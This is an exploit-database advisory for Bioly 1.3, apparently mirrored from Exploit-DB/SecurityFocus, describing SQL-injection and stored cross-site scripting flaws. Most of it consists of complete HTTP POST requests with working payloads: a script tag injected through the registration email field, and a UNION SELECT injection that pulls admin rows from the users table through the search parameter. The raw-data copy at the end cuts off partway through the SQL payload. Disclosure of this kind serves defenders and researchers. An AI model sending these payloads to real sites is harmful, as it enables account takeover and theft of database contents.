Bioly Multiple SQL-Injection and Cross-Site Scripting Vulnerabilities

vendor:

Bioly

by:

SecurityFocus

6,4

CVSS

MEDIUM

SQL-Injection and Cross-Site Scripting

89, 79

CWE

Product Name: Bioly

Affected Version From: 1.3

Affected Version To: 1.3

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2012

Bioly Multiple SQL-Injection and Cross-Site Scripting Vulnerabilities

Bioly is prone to multiple SQL-injection and cross-site scripting vulnerabilities. Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. Cross Site Scripting: POST /index.php?action=3 HTTP/1.1 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: STORED XSS TEST Host: localhost Content-Length: 68 Connection: Close Pragma: no-cache Post Data: email=>"><ScRiPt%20%0a%0d>alert(421135893768)%3B</ScRiPt>&register=1 SQL Injection: POST /index.php?action=11 HTTP/1.1 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Sql Injection Host: localhost Content-Length: 68 Connection: Close Pragma: no-cache Post Data: q=%00'%20UNION%20SELECT%20*%20FROM%20users%20WHERE%20username='admin'%20AND%20password='admin'/*

Mitigation:

Input validation should be used to prevent SQL injection and cross-site scripting attacks. Sanitize user input and output to prevent malicious code from being executed.

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/53018/info

Bioly is prone to multiple SQL-injection and cross-site scripting vulnerabilities.

Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

Bioly 1.3 is vulnerable; other versions may also be affected. 

Cross Site Scripting
POST /index.php?action=3 HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: STORED XSS TEST
Host: localhost
Content-Length: 68
Connection: Close
Pragma: no-cache

# [Post Data:]==>
email=>"><ScRiPt%20%0a%0d>alert(421135893768)%3B</ScRiPt>&register=1


SQL Injection
POST /index.php?action=11 HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Sql Injection
Host: localhost
Content-Length: 68
Connection: Close
Pragma: no-cache

# [Post Data:]==>
q=%00'